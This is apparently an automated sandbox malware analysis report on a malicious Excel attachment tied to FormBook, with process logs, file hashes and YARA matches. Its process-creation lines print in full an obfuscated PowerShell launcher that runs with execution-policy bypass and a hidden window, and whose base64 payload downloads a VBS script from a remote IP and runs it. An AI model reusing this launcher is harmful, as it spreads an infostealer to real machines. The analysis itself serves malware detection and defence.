iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jgigicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagywrelvrzceugicagicagicagicagicagicagicagicagicagicagicatbuvnykvyzevmsw5pdelvtiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtb04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbzannpcxbmlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigdkclv3asxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbycsx1aw50icagicagicagicagicagicagicagicagicagicagicagc3zlcgpxbfbzleludfb0ciagicagicagicagicagicagicagicagicagicagicagifbgalb6ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicaiexjabwn4d09ybiigicagicagicagicagicagicagicagicagicagicagicattkftzvnwyunlicagicagicagicagicagicagicagicagicagicagicagrkpnd0h4zudiicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicriojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta0lje2oc43ljcvmzu2l0lfbmv0ym9va3vwzgf0aw9ulnzicyisiirltny6qvbqrefuqvxfbmv0ym9va3vwzgf0aw9ulnzicyismcwwkttzvgfsvc1ttgvfccgzktttdgfsvcagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcrw5ldgjvb2t1cgrhdglvbi52ynmi'+[char]34+'))')))"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\temp_exec.exe VolumeInformation	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
PI#0034250924.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1522509
Product:	CloudBasic
Start time:	10:14:31
Start date:	30.09.2024
Sample:	PI#0034250924.xla.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7e28f8cffffe2ee9420b3ea7915101a4
SHA1:	83f9b8f410ed49d2de8fcee1d3659deb8d06adcf
SHA256:	2319aa2adb90c44bec9ad97f567b060722bdf5084e7f9b43c65b0feaee993227
Filetype:	Microsoft Excel sheet (30009/1) 47.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	7BC3FB6565E144A52C5F44408D5D80DF	C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77	EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators	5144E4B60C5A3831B980F834050AC4FE	DDAA3FC5EC7E7AAF93FC0BB7749D9C6FDEA2D499	41E8A02837AAAC07591484D4BD29E3B37F243CF4044A43D0A6DAE60571829CA8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetbookupdation[1].vbs	ASCII text, with very long lines (65478), with CRLF line terminators	53512A7D960A5CC729101E63B7BC304D	A22065BB3B20F561535A6482B8AEC353B094A2B8	E9E5A2BAF0C323EFC420EA80B8D08A75B99CCFFA4CE3B6C67E605F27FD0013B9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	C8FF65340D86E7546ED74F2AEA89FF70	C3C02AC92015D94D4D68479DADB5CD110C6CF8C9	58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
C:\Users\user\AppData\Local\Temp\RESB8B5.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:26:28 2024, 1st section name ".debug$S"	BF5E93AD676C6DF06158E49B23555ECD	CB2B23F250DA39FA2328262D297A9A6F141E3D77	FCB68F084ACF1C50E7C70F86AAD0C56BDDA504213F50DAADD7CAA7DA98EBB418
C:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP	MSVC .res	D7E75E2DED873EA134E81C656D53E38C	935A0C43B2D83FF3C990976149CD70B0FDD33DEE	8B0A006080FDF8430F9C2D04C7509E0C81AB6152EA42A43D915F5C0A9AE8AABA
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)	8E7BE84B6D73B0125DA898BF4FE40A8B	0C09415A7F4B9BB4C4B9A7EA95D7079E28C12132	76F406E082EAD6D4396D40EDB1347F631F731BF7F1912128F6BFFC131EB7D350
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators	44612028F23695DCBD6AC49BD1C78777	29C32A6C7C419F8668DF0B79CFA8846555041D38	9D94F940BD70B4EE5E2B03B8DA51E1E673C2F65313E12DB206E4C431DDB112F8
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	F1E4ED729C6C5EF5659295E909EBCD6B	2D9FE08F4A6463D9C57FFD244005BC0710FE5C10	74E7243146ADC40F7EAF0D3CF1E6F699236114A1C5FB475E36AD5108AAAF24F6
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.out	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators	11DA92FD90C813DEDD2FE8B6108BE087	A8B7C6B0AC4179A30BE0A8D7505934836662CFB0	E26164140A95A6032606104F95DA9F688B0D2586288C990D6B0202A0609AB2C9
C:\Users\user\AppData\Local\Temp\fji3hte3.a5m.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\s4hj22iq.ipe.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\temp_exec.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	77733FB5B16FC7AE0944C92FD2E89D7E	9BA5582FC3A6570BE7872F05E13DCE27C5C7B741	95E1A03325DDA8B3FC31E2DD4BBFA55789115AE87E948AB4DD596BF14F5FF243
C:\Users\user\AppData\Local\Temp\~DF096F86C2DF7A876A.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DFF1E1590C893D8C32.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Roaming\Enetbookupdation.vbs	ASCII text, with very long lines (65478), with CRLF line terminators	53512A7D960A5CC729101E63B7BC304D	A22065BB3B20F561535A6482B8AEC353B094A2B8	E9E5A2BAF0C323EFC420EA80B8D08A75B99CCFFA4CE3B6C67E605F27FD0013B9
C:\Users\user\Desktop\F7A30000	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1	5036DF6BAAA88149B6C575451BE7F0EE	F502BFDBD8A27DE2AD5C06FB090A01D42E51B635	F9D22B22A31BBB7535E00A883FFFFAE8DB8368D634110122D7719CE0CE9098FD
C:\Users\user\Desktop\F7A30000:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Desktop\PI#0034250924.xla.xls (copy)	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1	5036DF6BAAA88149B6C575451BE7F0EE	F502BFDBD8A27DE2AD5C06FB090A01D42E51B635	F9D22B22A31BBB7535E00A883FFFFAE8DB8368D634110122D7719CE0CE9098FD
C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185

Windows Analysis Report PI#0034250924.xla.xlsx

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PI#0034250924.xla.xlsx

Malware Threat Intel
Provided by